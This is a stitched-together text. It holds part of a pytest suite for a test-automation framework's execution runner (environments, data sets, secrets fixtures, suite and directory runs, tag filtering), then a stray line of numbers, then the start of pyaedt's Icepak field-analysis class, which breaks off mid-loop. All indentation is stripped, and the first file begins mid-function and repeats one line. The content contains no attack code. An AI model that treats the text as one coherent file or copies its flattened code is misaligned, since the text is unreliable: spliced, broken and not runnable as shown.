"""Verify that _select_environments uses the correct order
of precedence when cli environments, suite environments and
project environments are empty"""
_, project = project_function.activate()
execution_runner = exc_runner.ExecutionRunner()
execution_runner.project = project
execution_runner.cli_args.envs = []
execution_runner.cli_args.envs = []
project_envs = environment_manager.get_envs(project)
result_envs = execution_runner._select_environments(project_envs)
assert result_envs == []
class TestDefineExecutionList:
@pytest.mark.slow
def test_define_execution_list(self, project_function_clean):
"""Verify that the execution list is generated properly when there's only
one test without datasets, one driver and zero environments
"""
project_function_clean.activate()
execution_runner = exc_runner.ExecutionRunner()
execution_runner.tests = ['test_001']
execution_runner.execution.processes = 1
execution_runner.execution.browsers = ['chrome']
execution_runner.execution.envs = []
execution_runner.project = project_function_clean.name
execution_list = execution_runner._define_execution_list()
expected_list = [
SimpleNamespace(name='test_001', data_set={}, secrets={}, browser='chrome',
reportdir=None, env=None)
]
assert execution_list == expected_list
@pytest.mark.slow
def test_define_execution_list_multiple_data_sets(self, project_function_clean):
"""Verify that the execution list is generated properly when a test
has multiple data sets
"""
_, project = project_function_clean.activate()
test_name = 'test_002'
test.create_test(project, test_name)
tdata = [
{
'col1': 'a',
'col2': 'b'
},
{
'col1': 'c',
'col2': 'd',
}
]
test_data.save_external_test_data_file(project, test_name, tdata)
execution_runner = exc_runner.ExecutionRunner()
execution_runner.tests = [test_name]
execution_runner.execution.processes = 1
execution_runner.execution.browsers = ['chrome']
execution_runner.execution.envs = []
execution_runner.project = project_function_clean.name
execution_list = execution_runner._define_execution_list()
expected_list = [
SimpleNamespace(name=test_name, data_set={'col1': 'a', 'col2': 'b'}, secrets={},
browser='chrome', reportdir=None, env=None),
SimpleNamespace(name=test_name, data_set={'col1': 'c', 'col2': 'd'}, secrets={},
browser='chrome', reportdir=None, env=None)
]
assert execution_list == expected_list
@pytest.mark.slow
def test_define_execution_list_multiple_tests(self, project_function_clean):
"""Verify that the execution list is generated properly when there
are multiple tests in the list
"""
_, project = project_function_clean.activate()
# create test one
test_name_one = 'test_one_001'
test.create_test(project, test_name_one)
tdata = [
{
'col1': 'a',
'col2': 'b'
},
{
'col1': 'c',
'col2': 'd',
}
]
test_data.save_external_test_data_file(project, test_name_one, tdata)
# create test two
test_name_two = 'test_two_001'
test.create_test(project, test_name_two)
execution_runner = exc_runner.ExecutionRunner()
execution_runner.tests = [test_name_one, test_name_two]
execution_runner.execution.processes = 1
execution_runner.execution.browsers = ['chrome']
execution_runner.execution.envs = []
execution_runner.project = project
execution_list = execution_runner._define_execution_list()
expected_list = [
SimpleNamespace(name='test_one_001', data_set={'col1': 'a', 'col2': 'b'}, secrets={},
browser='chrome', reportdir=None, env=None),
SimpleNamespace(name='test_one_001', data_set={'col1': 'c', 'col2': 'd'}, secrets={},
browser='chrome', reportdir=None, env=None),
SimpleNamespace(name='test_two_001', data_set={}, secrets={},
browser='chrome', reportdir=None, env=None)
]
assert execution_list == expected_list
@pytest.mark.slow
def test_define_execution_list_multiple_envs(self, project_function_clean):
"""Verify that the execution list is generated properly when the execution
has multiple envs
"""
_, project = project_function_clean.activate()
# create test one
test_name_one = 'test_one_003'
test.create_test(project, test_name_one)
# create two environments in environments.json
env_data = {
"stage": {"url": "xxx"},
"preview": {"url": "yyy"}
}
env_data_json = json.dumps(env_data)
environment_manager.save_environments(project, env_data_json)
execution_runner = exc_runner.ExecutionRunner()
execution_runner.tests = [test_name_one]
execution_runner.execution.processes = 1
execution_runner.execution.browsers = ['chrome']
execution_runner.execution.envs = ['stage', 'preview']
execution_runner.project = project
execution_list = execution_runner._define_execution_list()
expected_list = [
SimpleNamespace(name='test_one_003', data_set={'env': {'url': 'xxx', 'name': 'stage'}}, secrets={},
browser='chrome', reportdir=None, env='stage'),
SimpleNamespace(name='test_one_003', data_set={'env': {'url': 'yyy', 'name': 'preview'}}, secrets={},
browser='chrome', reportdir=None, env='preview')
]
assert execution_list == expected_list
@pytest.mark.slow
def test_define_execution_list_multiple_drivers(self, project_function_clean):
"""Verify that the execution list is generated properly when there
are multiple drivers in the list
"""
_, project = project_function_clean.activate()
# create test one
test_name_one = 'test_one_004'
test.create_test(project, test_name_one)
# create test two
test_name_two = 'test_two_004'
test.create_test(project, test_name_two)
execution_runner = exc_runner.ExecutionRunner()
execution_runner.tests = [test_name_one, test_name_two]
execution_runner.execution.processes = 1
execution_runner.execution.browsers = ['chrome', 'firefox']
execution_runner.execution.envs = []
execution_runner.project = project
execution_list = execution_runner._define_execution_list()
expected_list = [
SimpleNamespace(name='test_one_004', data_set={}, secrets={}, browser='chrome', reportdir=None, env=None),
SimpleNamespace(name='test_one_004', data_set={}, secrets={}, browser='firefox', reportdir=None, env=None),
SimpleNamespace(name='test_two_004', data_set={}, secrets={}, browser='chrome', reportdir=None, env=None),
SimpleNamespace(name='test_two_004', data_set={}, secrets={}, browser='firefox', reportdir=None, env=None)
]
assert execution_list == expected_list
@pytest.mark.slow
def test_define_execution_list_multiple_tests_datasets_drivers_envs(
self, project_function_clean):
"""Verify that the execution list is generated properly when there
are multiple tests, data sets, drivers and environments
"""
_, project = project_function_clean.activate()
# create test one
test_name_one = 'test_one_005'
test.create_test(project, test_name_one)
# test data for test one
tdata = [
{'col1': 'a' },
{'col1': 'b'}
]
test_data.save_external_test_data_file(project, test_name_one, tdata)
# create test two
test_name_two = 'test_two_005'
test.create_test(project, test_name_two)
# create two environments
env_data = {
"stage": {"url": "xxx"},
"preview": {"url": "yyy"}
}
env_data_json = json.dumps(env_data)
environment_manager.save_environments(project, env_data_json)
execution_runner = exc_runner.ExecutionRunner()
execution_runner.tests = [test_name_one, test_name_two]
execution_runner.execution.processes = 1
execution_runner.execution.browsers = ['chrome', 'firefox']
execution_runner.execution.envs = ['stage', 'preview']
execution_runner.project = project
execution_list = execution_runner._define_execution_list()
expected_list = [
SimpleNamespace(browser='chrome', data_set={'col1': 'a', 'env': {'url': 'xxx', 'name': 'stage'}},
secrets={}, name='test_one_005', reportdir=None, env='stage'),
SimpleNamespace(browser='firefox', data_set={'col1': 'a', 'env': {'url': 'xxx', 'name': 'stage'}},
secrets={}, name='test_one_005', reportdir=None, env='stage'),
SimpleNamespace(browser='chrome', data_set={'col1': 'a', 'env': {'url': 'yyy', 'name': 'preview'}},
secrets={}, name='test_one_005', reportdir=None, env='preview'),
SimpleNamespace(browser='firefox', data_set={'col1': 'a', 'env': {'url': 'yyy', 'name': 'preview'}},
secrets={}, name='test_one_005', reportdir=None, env='preview'),
SimpleNamespace(browser='chrome', data_set={'col1': 'b', 'env': {'url': 'xxx', 'name': 'stage'}},
secrets={}, name='test_one_005', reportdir=None, env='stage'),
SimpleNamespace(browser='firefox', data_set={'col1': 'b', 'env': {'url': 'xxx', 'name': 'stage'}},
secrets={}, name='test_one_005', reportdir=None, env='stage'),
SimpleNamespace(browser='chrome', data_set={'col1': 'b', 'env': {'url': 'yyy', 'name': 'preview'}},
secrets={}, name='test_one_005', reportdir=None, env='preview'),
SimpleNamespace(browser='firefox', data_set={'col1': 'b', 'env': {'url': 'yyy', 'name': 'preview'}},
secrets={}, name='test_one_005', reportdir=None, env='preview'),
SimpleNamespace(browser='chrome', data_set={'env': {'url': 'xxx', 'name': 'stage'}},
secrets={}, name='test_two_005', reportdir=None, env='stage'),
SimpleNamespace(browser='firefox', data_set={'env': {'url': 'xxx', 'name': 'stage'}},
secrets={}, name='test_two_005', reportdir=None, env='stage'),
SimpleNamespace(browser='chrome', data_set={'env': {'url': 'yyy', 'name': 'preview'}},
secrets={}, name='test_two_005', reportdir=None, env='preview'),
SimpleNamespace(browser='firefox', data_set={'env': {'url': 'yyy','name': 'preview'}},
secrets={}, name='test_two_005', reportdir=None, env='preview')
]
assert execution_list == expected_list
@pytest.mark.slow
def test_define_execution_list_with_secrets(self, project_function_clean):
"""Verify that the execution list is generated properly when there's only
one test without datasets, one driver and zero environments
"""
_, project = project_function_clean.activate()
secrets = {"a": "secret", "b": "secret02"}
secrets_path = os.path.join(project_function_clean.path, 'secrets.json')
with open(secrets_path, 'w') as secrets_file:
secrets_file.write(json.dumps(secrets, indent=True))
execution_runner = exc_runner.ExecutionRunner()
execution_runner.tests = ['test_001']
execution_runner.execution.processes = 1
execution_runner.execution.browsers = ['chrome']
execution_runner.execution.envs = []
execution_runner.project = project
execution_list = execution_runner._define_execution_list()
expected_list = [
SimpleNamespace(name='test_001', data_set={}, secrets={"a": "secret", "b": "secret02"}, browser='chrome', reportdir=None, env=None)
]
assert execution_list == expected_list
class TestCreateExecutionDirectory:
@pytest.mark.slow
def test__create_execution_directory_is_suite(self, project_class):
"""Verify that create_execution_directory works as expected when
a suite is passed on
"""
_, project = project_class.activate()
timestamp = utils.get_timestamp()
suite_name = 'bar'
execution_runner = exc_runner.ExecutionRunner()
execution_runner.tests = ['test_foo']
execution_runner.project = project
execution_runner.is_suite = True
execution_runner.suite_name = suite_name
execution_runner.timestamp = timestamp
execution_runner._create_execution_directory()
expected_path = os.path.join(project_class.path, 'reports', suite_name, timestamp)
assert os.path.isdir(expected_path)
@pytest.mark.slow
def test__create_execution_directory_is_not_suite(self, project_class):
"""Verify that create_execution_directory works as expected when
a not suite is passed on
"""
_, project = project_class.activate()
test_name = 'foo'
timestamp = utils.get_timestamp()
execution_runner = exc_runner.ExecutionRunner()
execution_runner.test_name = test_name
execution_runner.project = project
execution_runner.is_suite = False
execution_runner.timestamp = timestamp
execution_runner._create_execution_directory()
expected_path = os.path.join(project_class.path, 'reports', 'single_tests', test_name, timestamp)
assert os.path.isdir(expected_path)
class TestRunSingleTest:
@pytest.mark.slow
def test_run_single_test(self, project_class, test_utils):
testdir, project = project_class.activate()
test_name = 'foo001'
timestamp = utils.get_timestamp()
session.settings = settings_manager.get_project_settings(project)
test_utils.create_test(project, test_name)
execution_runner = exc_runner.ExecutionRunner(browsers=['chrome'], timestamp=timestamp)
execution_runner.project = project
execution_runner.run_test(test_name)
test_report_dir = os.path.join(testdir, 'projects', project, 'reports',
'single_tests', test_name, timestamp)
assert os.path.isdir(test_report_dir)
items = os.listdir(test_report_dir)
# test set dir + report.json
assert len(items) == 2
@pytest.mark.slow
def test_run_single_test_with_two_sets(self, project_class, test_utils, capsys):
"""Run a single test with two data sets.
It should display the number of tests and test sets found."""
testdir, project = project_class.activate()
test_name = 'foo002'
timestamp = utils.get_timestamp()
session.settings = settings_manager.get_project_settings(project)
content = ('data = [{"foo": 1}, {"foo": 2}]\n'
'def test(data):\n'
' pass\n')
test_utils.create_test(project, test_name, content=content)
execution_runner = exc_runner.ExecutionRunner(browsers=['chrome'], timestamp=timestamp)
execution_runner.project = project
execution_runner.run_test(test_name)
out, err = capsys.readouterr()
# number of tests is displayed
assert 'Tests found: 1 (2 sets)' in out
test_report_dir = os.path.join(testdir, 'projects', project, 'reports',
'single_tests', test_name, timestamp)
assert os.path.isdir(test_report_dir)
items = os.listdir(test_report_dir)
# two test set dirs + report.json
assert len(items) == 3
@pytest.mark.slow
def test_run_single_test_filter_by_tags(self, project_class, test_utils):
"""Run a single test with filtering by tags"""
testdir, project = project_class.activate()
test_name = 'foo003'
timestamp = utils.get_timestamp()
session.settings = settings_manager.get_project_settings(project)
content = ('tags = ["alfa", "bravo"]\n'
'def test(data):\n'
' pass\n')
test_utils.create_test(project, test_name, content=content)
execution_runner = exc_runner.ExecutionRunner(browsers=['chrome'], timestamp=timestamp,
tags=['alfa'])
execution_runner.project = project
execution_runner.run_test(test_name)
test_report_dir = os.path.join(testdir, 'projects', project, 'reports',
'single_tests', test_name, timestamp)
assert os.path.isdir(test_report_dir)
items = os.listdir(test_report_dir)
# test set dir + report.json
assert len(items) == 2
@pytest.mark.slow
def test_run_single_test_with_invalid_tags(self, project_class, test_utils, capsys):
testdir, project = project_class.activate()
test_name = 'foo004'
timestamp = utils.get_timestamp()
content = ('tags = ["alfa", "bravo"]\n'
'def test(data):\n'
' pass\n')
test_utils.create_test(project, test_name, content=content)
execution_runner = exc_runner.ExecutionRunner(browsers=['chrome'], timestamp=timestamp,
tags=['charlie'])
execution_runner.project = project
execution_runner.run_test(test_name)
out, err = capsys.readouterr()
assert 'No tests found with tag(s): charlie' in out
test_report_dir = os.path.join(testdir, 'projects', project, 'reports',
'single_tests', test_name, timestamp)
assert os.path.isdir(test_report_dir)
items = os.listdir(test_report_dir)
# only report.json is present
assert items == ['report.json']
class TestRunSuite:
@pytest.fixture(scope="class")
def _project_with_tags(self, project_class, test_utils):
"""A fixture of a project with tests that contain tags"""
_, project = project_class.activate()
tests = SimpleNamespace()
base_content = 'def test(data):\n pass\n'
tests.test_alfa_bravo = 'test_alfa_bravo'
content = 'tags = ["alfa", "bravo"]'
test_utils.create_test(project, tests.test_alfa_bravo, content=base_content+content)
tests.test_bravo_charlie = 'test_bravo_charlie'
content = 'tags = ["bravo", "charlie"]'
test_utils.create_test(project, tests.test_bravo_charlie, content=base_content+content)
tests.test_empty_tags = 'test_empty_tags'
content = 'tags = []'
test_utils.create_test(project, tests.test_empty_tags, content=base_content+content)
tests.test_no_tags = 'test_no_tags'
content = 'def test(data):\n pass'
test_utils.create_test(project, tests.test_no_tags, content=base_content+content)
project_class.tests = list(tests.__dict__)
project_class.t = tests
return project_class
@pytest.mark.slow
def test_run_suite(self, _project_with_tags, test_utils, capsys):
_, project = _project_with_tags.activate()
suite_name = test_utils.random_numeric_string(10, 'suite')
tests = [_project_with_tags.t.test_alfa_bravo,
_project_with_tags.t.test_bravo_charlie]
test_utils.create_suite(project, suite_name, tests=tests)
timestamp = utils.get_timestamp()
execution_runner = exc_runner.ExecutionRunner(browsers=['chrome'], timestamp=timestamp)
execution_runner.project = project
execution_runner.run_suite(suite_name)
out, err = capsys.readouterr()
assert 'Tests found: 2' in out
data = exec_report.get_execution_data(project=project, suite=suite_name, execution=timestamp)
assert data['has_finished'] is True
assert data['total_tests'] == 2
def test_run_suite_without_tests(self, _project_with_tags, test_utils, capsys):
_, project = _project_with_tags.activate()
suite_name = test_utils.random_numeric_string(10, 'suite')
test_utils.create_suite(project, suite_name, tests=[])
timestamp = utils.get_timestamp()
execution_runner = exc_runner.ExecutionRunner(browsers=['chrome'], timestamp=timestamp)
execution_runner.project = project
execution_runner.run_suite(suite_name)
out, err = capsys.readouterr()
assert 'No tests found for suite {}'.format(suite_name) in out
data = exec_report.get_execution_data(project=project, suite=suite_name, execution=timestamp)
assert data['has_finished'] is True
assert data['total_tests'] == 0
@pytest.mark.slow
def test_run_suite_filter_by_tags(self, _project_with_tags, test_utils, capsys):
_, project = _project_with_tags.activate()
suite_name = test_utils.random_numeric_string(10, 'suite')
tests = [_project_with_tags.t.test_alfa_bravo,
_project_with_tags.t.test_bravo_charlie]
test_utils.create_suite(project, suite_name, tests=tests)
timestamp = utils.get_timestamp()
execution_runner = exc_runner.ExecutionRunner(browsers=['chrome'],
timestamp=timestamp,
tags=['alfa', 'bravo'])
execution_runner.project = project
execution_runner.run_suite(suite_name)
out, err = capsys.readouterr()
assert 'Tests found: 1' in out
data = exec_report.get_execution_data(project=project, suite=suite_name, execution=timestamp)
assert data['has_finished'] is True
assert data['total_tests'] == 1
@pytest.mark.slow
def test_run_suite_filter_by_invalid_tags(self, _project_with_tags, test_utils, capsys):
_, project = _project_with_tags.activate()
suite_name = test_utils.random_numeric_string(10, 'suite')
tests = [_project_with_tags.t.test_alfa_bravo,
_project_with_tags.t.test_bravo_charlie]
test_utils.create_suite(project, suite_name, tests=tests)
timestamp = utils.get_timestamp()
execution_runner = exc_runner.ExecutionRunner(browsers=['chrome'],
timestamp=timestamp,
tags=['sierra', 'tango'])
execution_runner.project = project
execution_runner.run_suite(suite_name)
out, err = capsys.readouterr()
assert 'No tests found with tag(s): sierra, tango' in out
data = exec_report.get_execution_data(project=project, suite=suite_name, execution=timestamp)
assert data['has_finished'] is True
assert data['total_tests'] == 0
def test_run_suite_filter_by_invalid_tag_expression(self, _project_with_tags,
test_utils, capsys):
"""When a invalid tag expression is used a message is displayed
to the console, no tests are run, the report is generated,
and the execution exists with status code 1
"""
_, project = _project_with_tags.activate()
suite_name = test_utils.random_numeric_string(10, 'suite')
tests = [_project_with_tags.t.test_alfa_bravo,
_project_with_tags.t.test_bravo_charlie]
test_utils.create_suite(project, suite_name, tests=tests)
timestamp = utils.get_timestamp()
execution_runner = exc_runner.ExecutionRunner(browsers=['chrome'],
timestamp=timestamp,
tags=['sierra = tango'])
execution_runner.project = project
with pytest.raises(SystemExit):
execution_runner.run_suite(suite_name)
out, err = capsys.readouterr()
expected = ("InvalidTagExpression: unknown expression <class '_ast.Assign'>, the "
"only valid operators for tag expressions are: 'and', 'or' & 'not'")
# TODO: py 3.9
expected2 = ("InvalidTagExpression: unknown expression <class 'ast.Assign'>, the "
"only valid operators for tag expressions are: 'and', 'or' & 'not'")
assert expected in out or expected2 in out
data = exec_report.get_execution_data(project=project, suite=suite_name, execution=timestamp)
assert data['has_finished'] is True
assert data['total_tests'] == 0
class TestRunDirectory:
@pytest.fixture(scope="class")
def _project_with_tags(self, project_class, test_utils):
"""A fixture of a project with tests that contain tags"""
testdir, project = project_class.activate()
tests = SimpleNamespace()
base_content = 'def test(data):\n pass\n'
tests.test_alfa_bravo = 'test_alfa_bravo'
content = 'tags = ["alfa", "bravo"]'
test_name = '{}.{}'.format('foo', tests.test_alfa_bravo)
test_utils.create_test(project, test_name, content=base_content + content)
tests.test_bravo_charlie = 'test_bravo_charlie'
content = 'tags = ["bravo", "charlie"]'
test_name = '{}.{}'.format('foo', tests.test_bravo_charlie)
test_utils.create_test(project, test_name, content=base_content + content)
tests.test_empty_tags = 'test_empty_tags'
content = 'tags = []'
test_utils.create_test(project, tests.test_empty_tags, content=base_content + content)
tests.test_no_tags = 'test_no_tags'
content = 'def test(data):\n pass'
test_utils.create_test(project, tests.test_no_tags, content=base_content + content)
path_list = [testdir, 'projects', project, 'tests', 'empty']
file_manager.create_directory(path_list=path_list, add_init=True)
project_class.tests = list(tests.__dict__)
project_class.t = tests
return project_class
@pytest.mark.slow
def test_run_directory(self, _project_with_tags, capsys):
_, project = _project_with_tags.activate()
timestamp = utils.get_timestamp()
execution_runner = exc_runner.ExecutionRunner(browsers=['chrome'], timestamp=timestamp)
execution_runner.project = project
execution_runner.run_directory('foo')
out, err = capsys.readouterr()
assert 'Tests found: 2' in out
data = exec_report.get_execution_data(project=project, suite='foo', execution=timestamp)
assert data['has_finished'] is True
assert data['total_tests'] == 2
def test_run_directory_without_tests(self, _project_with_tags, capsys):
_, project = _project_with_tags.activate()
timestamp = utils.get_timestamp()
dirname = 'empty'
execution_runner = exc_runner.ExecutionRunner(browsers=['chrome'], timestamp=timestamp)
execution_runner.project = project
execution_runner.run_directory(dirname)
out, err = capsys.readouterr()
expected = 'No tests were found in {}'.format(os.path.join('tests', dirname))
assert expected in out
data = exec_report.get_execution_data(project=project, suite=dirname, execution=timestamp)
assert data['has_finished'] is True
assert data['total_tests'] == 0
@pytest.mark.slow
def test_run_directory_filter_by_tags(self, _project_with_tags, test_utils, capsys):
_, project = _project_with_tags.activate()
timestamp = utils.get_timestamp()
dirname = 'foo'
execution_runner = exc_runner.ExecutionRunner(browsers=['chrome'],
timestamp=timestamp,
tags=['alfa', 'bravo'])
execution_runner.project = project
execution_runner.run_directory(dirname)
out, err = capsys.readouterr()
assert 'Tests found: 1' in out
data = exec_report.get_execution_data(project=project, suite=dirname, execution=timestamp)
assert data['has_finished'] is True
assert data['total_tests'] == 1
class TestRunWithEnvs:
@pytest.mark.slow
def test_run_with_environments(self, project_function, test_utils, capsys):
_, project = project_function.activate()
environments = json.dumps({'test': {}, 'stage': {}})
environment_manager.save_environments(project, environments)
test_utils.create_test(project, 'test01')
timestamp = utils.get_timestamp()
execution_runner = exc_runner.ExecutionRunner(browsers=['chrome'],
timestamp=timestamp,
environments=['test', 'stage'])
execution_runner.project = project
execution_runner.run_directory('')
out, err = capsys.readouterr()
assert 'Tests found: 1 (2 sets)' in out
data = exec_report.get_execution_data(project=project, suite='all', execution=timestamp)
assert data['has_finished'] is True
assert data['total_tests'] == 2
def test_run_with_not_existing_environments(self, project_function, test_utils, capsys):
"""Run tests with a not existing environment.
It should throw an error and finish with status code 1
"""
_, project = project_function.activate()
test_utils.create_test(project, 'test01')
timestamp = utils.get_timestamp()
execution_runner = exc_runner.ExecutionRunner(browsers=['chrome'],
timestamp=timestamp,
environments=['not_existing'])
execution_runner.project = project
with pytest.raises(SystemExit) as wrapped_execution:
execution_runner.run_directory('')
assert wrapped_execution.value.code == 1
out, err = capsys.readouterr()
msg = ('ERROR: the following environments do not exist for project {}: '
'not_existing'.format(project))
assert msg in out
data = exec_report.get_execution_data(project=project, suite='all', execution=timestamp)
assert data['has_finished'] is True
assert data['total_tests'] == 0 | 0.49707 | 0.33334 |
import csv
import re
import os
from pyaedt.generic.general_methods import aedt_exception_handler, generate_unique_name, is_ironpython
from pyaedt.application.Analysis import Analysis
from pyaedt.modeler.Model3D import Modeler3D
from pyaedt.modules.MeshIcepak import IcepakMesh
if is_ironpython:
from pyaedt.modules.PostProcessor import PostProcessor
else:
from pyaedt.modules.AdvancedPostProcessing import PostProcessor
class FieldAnalysisIcepak(Analysis, object):
"""Manages 3D field analysis setup in Icepak.
This class is automatically initialized by an appliation call from
HFSS, Icepak, Q3D, or Maxwell 3D. See the application function
for parameter definitions.
Parameters
----------
application : str
Application that is to initialize the call.
projectname : str, optional
Name of the project to select or the full path to the project
or AEDTZ archive to open. The default is ``None``, in which
case an attempt is made to get an active project. If no
projects are present, an empty project is created.
designname : str, optional
Name of the design to select. The default is ``None``, in
which case an attempt is made to get an active design. If no
designs are present, an empty design is created.
solutiontype : str, optional
Solution type to apply to the design. The default is
``None``, in which case the default type is applied.
setup_name : str, optional
Name of the setup to use as the nominal. The default is
``None``, in which case the active setup is used or
nothing is used.
specified_version : str, optional
Version of AEDT to use. The default is ``None``, in which case
the active version or latest installed version is used.
NG : bool, optional
Whether to run AEDT in the non-graphical mode. The default
is ``False``, in which case AEDT launches in the graphical mode.
new_desktop_session : bool, optional
Whether to launch an instance of AEDT in a new thread, even if
another instance of the ``specified_version`` is active on the
machine. The default is ``True``.
close_on_exit : bool, optional
Whether to release AEDT on exit. The default is ``False``.
student_version : bool, optional
Whether to enable the student version of AEDT. The default
is ``False``.
"""
def __init__(
self,
application,
projectname,
designname,
solutiontype,
setup_name=None,
specified_version=None,
non_graphical=False,
new_desktop_session=False,
close_on_exit=False,
student_version=False,
):
Analysis.__init__(
self,
application,
projectname,
designname,
solutiontype,
setup_name,
specified_version,
non_graphical,
new_desktop_session,
close_on_exit,
student_version,
)
self._osolution = self._odesign.GetModule("Solutions")
self._oboundary = self._odesign.GetModule("BoundarySetup")
self._modeler = Modeler3D(self)
self._mesh = IcepakMesh(self)
self._post = PostProcessor(self)
@property
def osolution(self):
"""Solution Module.
References
----------
>>> oModule = oDesign.GetModule("Solutions")
"""
return self._osolution
@property
def oboundary(self):
"""Boundary Module.
References
----------
>>> oModule = oDesign.GetModule("BoundarySetup")
"""
return self._oboundary
@property
def modeler(self):
"""Modeler.
Returns
-------
:class:`pyaedt.modeler.Model3D.Modeler3D`
"""
return self._modeler
@property
def mesh(self):
"""Mesh.
Returns
-------
:class:`pyaedt.modules.MeshIcepak.IcepakMesh`
"""
return self._mesh
@aedt_exception_handler
def plot(
self,
objects=None,
show=True,
export_path=None,
plot_as_separate_objects=True,
plot_air_objects=True,
force_opacity_value=None,
clean_files=False,
):
"""Plot the model or a substet of objects.
Parameters
----------
objects : list, optional
Optional list of objects to plot. If `None` all objects will be exported.
show : bool, optional
Show the plot after generation or simply return the
generated Class for more customization before plot.
export_path : str, optional
If available, an image is saved to file. If `None` no image will be saved.
plot_as_separate_objects : bool, optional
Plot each object separately. It may require more time to export from AEDT.
plot_air_objects : bool, optional
Plot also air and vacuum objects.
force_opacity_value : float, optional
Opacity value between 0 and 1 to be applied to all model.
If `None` aedt opacity will be applied to each object.
clean_files : bool, optional
Clean created files after plot. Cache is mainteined into the model object returned.
Returns
-------
:class:`pyaedt.generic.plot.ModelPlotter`
Model Object.
"""
if is_ironpython:
self.logger.warning("Plot is available only on CPython")
elif self._aedt_version < "2021.2":
self.logger.warning("Plot is supported from AEDT 2021 R2.")
else:
return self.post.plot_model_obj(
objects=objects,
show=show,
export_path=export_path,
plot_as_separate_objects=plot_as_separate_objects,
plot_air_objects=plot_air_objects,
force_opacity_value=force_opacity_value,
clean_files=clean_files,
)
@aedt_exception_handler
def apply_icepak_settings(
self,
ambienttemp=20,
gravityDir=5,
perform_minimal_val=True,
default_fluid="air",
default_solid="Al-Extruded",
default_surface="Steel-oxidised-surface",
):
"""Apply Icepak default design settings.
Parameters
----------
ambienttemp : float, optional
Ambient temperature, which can be an integer or a parameter already
created in AEDT. The default is ``20``.
gravityDir : int, optional
Gravity direction index in the range ``[0, 5]``. The default is ``5``.
perform_minimal_val : bool, optional
Whether to perform minimal validation. The default is ``True``.
If ``False``, full validation is performend.
default_fluid : str, optional
Default for the type of fluid. The default is ``"Air"``.
default_solid :
Default for the type of solid. The default is ``"Al-Extruded"``.
default_surface :
Default for the type of surface. The default is ``"Steel-oxidised-surface"``.
Returns
-------
bool
``True`` when successful, ``False`` when failed.
References
----------
>>> oDesign.SetDesignSettings
"""
try:
AmbientTemp = str(float(ambienttemp)) + "cel"
except:
AmbientTemp = ambienttemp
IceGravity = ["X", "Y", "Z"]
GVPos = False
if int(gravityDir) > 2:
GVPos = True
GVA = IceGravity[int(gravityDir) - 3]
self.odesign.SetDesignSettings(
[
"NAME:Design Settings Data",
"Perform Minimal validation:=",
perform_minimal_val,
"Default Fluid Material:=",
default_fluid,
"Default Solid Material:=",
default_solid,
"Default Surface Material:=",
default_surface,
"AmbientTemperature:=",
AmbientTemp,
"AmbientPressure:=",
"0n_per_meter_sq",
"AmbientRadiationTemperature:=",
AmbientTemp,
"Gravity Vector CS ID:=",
1,
"Gravity Vector Axis:=",
GVA,
"Positive:=",
GVPos,
],
["NAME:Model Validation Settings"],
)
return True
@aedt_exception_handler
def export_3d_model(self, fileName, filePath, fileFormat=".step", object_list=[], removed_objects=[]):
"""Export the 3D model.
Parameters
----------
fileName : str
Name of the file.
filePath : str
Path for the file.
fileFormat : str, optional
Format of the file. The default is ``".step"``.
object_list : list, optional
List of objects to export. The default is ``[]``.
removed_objects : list, optional
The default is ``[]``.
Returns
-------
bool
``True`` when successful, ``False`` when failed.
References
----------
>>> oEditor.Export
"""
if not object_list:
allObjects = self.modeler.primitives.object_names
if removed_objects:
for rem in removed_objects:
allObjects.remove(rem)
else:
if "Region" in allObjects:
allObjects.remove("Region")
else:
allObjects = object_list[:]
self.logger.info("Exporting {} objects".format(len(allObjects)))
major = -1
minor = -1
# actual version supported by AEDT is 29.0
if fileFormat in [".step", ".stp", ".sm3", ".sat", ".sab"]:
major = 29
minor = 0
stringa = ",".join(allObjects)
arg = [
"NAME:ExportParameters",
"AllowRegionDependentPartSelectionForPMLCreation:=",
True,
"AllowRegionSelectionForPMLCreation:=",
True,
"Selections:=",
stringa,
"File Name:=",
os.path.join(filePath, fileName + fileFormat),
"Major Version:=",
major,
"Minor Version:=",
minor,
]
self.modeler.oeditor.Export(arg)
return True
@aedt_exception_handler
def get_property_value(self, objectname, property, type=None):
"""Retrieve a design property value for an object.
Parameters
----------
objectname : str
Name of the object.
property : str
Name of the design property.
type : string, optional
Type of the property. Options are ``"boundary"``,
``"excitation"``, ``"setup"``, and ``"mesh"``. The default
is ``None``.
Returns
-------
type
Value of the property.
References
----------
>>> oDesign.GetPropertyValue
Examples
--------
>>> val = ipk.get_property_value('BoundarySetup:Source1', 'Total Power')
"""
boundary = {"HFSS": "HfssTab", "Icepak": "Icepak", "Q3D": "Q3D", "Maxwell3D": "Maxwell3D"}
excitation = {"HFSS": "HfssTab", "Icepak": "Icepak", "Q3D": "Q3D", "Maxwell3D": "Maxwell3D"}
setup = {"HFSS": "HfssTab", "Icepak": "Icepak", "Q3D": "General", "Maxwell3D": "General"}
mesh = {"HFSS": "MeshSetupTab", "Icepak": "Icepak", "Q3D": "Q3D", "Maxwell3D": "Maxwell3D"}
all = {
"HFSS": ["HfssTab", "MeshSetupTab"],
"Icepak": ["Icepak"],
"Q3D": ["Q3D", "General"],
"Maxwell3D": ["Maxwell3D", "General"],
}
if type == "Boundary":
propserv = boundary[self._design_type]
val = self.odesign.GetPropertyValue(propserv, objectname, property)
return val
elif type == "Setup":
propserv = setup[self._design_type]
val = self.odesign.GetPropertyValue(propserv, objectname, property)
return val
elif type == "Excitation":
propserv = excitation[self._design_type]
val = self.odesign.GetPropertyValue(propserv, objectname, property)
return val
elif type == "Mesh":
propserv = mesh[self._design_type]
val = self.odesign.GetPropertyValue(propserv, objectname, property)
return val
else:
propservs = all[self._design_type]
for propserv in propservs:
properties = list(self.odesign.GetProperties(propserv, objectname))
if property in properties:
val = self.odesign.GetPropertyValue(propserv, objectname, property)
return val
return None
@aedt_exception_handler
def copy_solid_bodies_from(self, design, object_list=None, no_vacuum=True, no_pec=True):
"""Copy a list of objects from one design to the active design.
Parameters
----------
design : str
Starting application object. For example, ``'hfss1=HFSS3DLayout'``.
object_list : list, optional
List of objects to copy. The default is ``None``.
no_vacuum : bool, optional
Whether to include vacuum objects for the copied objects.
The default is ``True``.
no_pec :
Whether to include pec objects for the copied objects. The
default is ``True``.
Returns
-------
bool
``True`` when successful, ``False`` when failed.
References
----------
>>> oEditor.Copy
>>> oEditor.Paste
"""
body_list = design.modeler.solid_bodies
selection_list = []
material_properties = design.modeler.primitives.objects
for body in body_list:
include_object = True
if object_list:
if body not in object_list:
include_object = False
for key, val in material_properties.items():
if val.name == body:
if no_vacuum and val.material_name == "Vacuum":
include_object = False
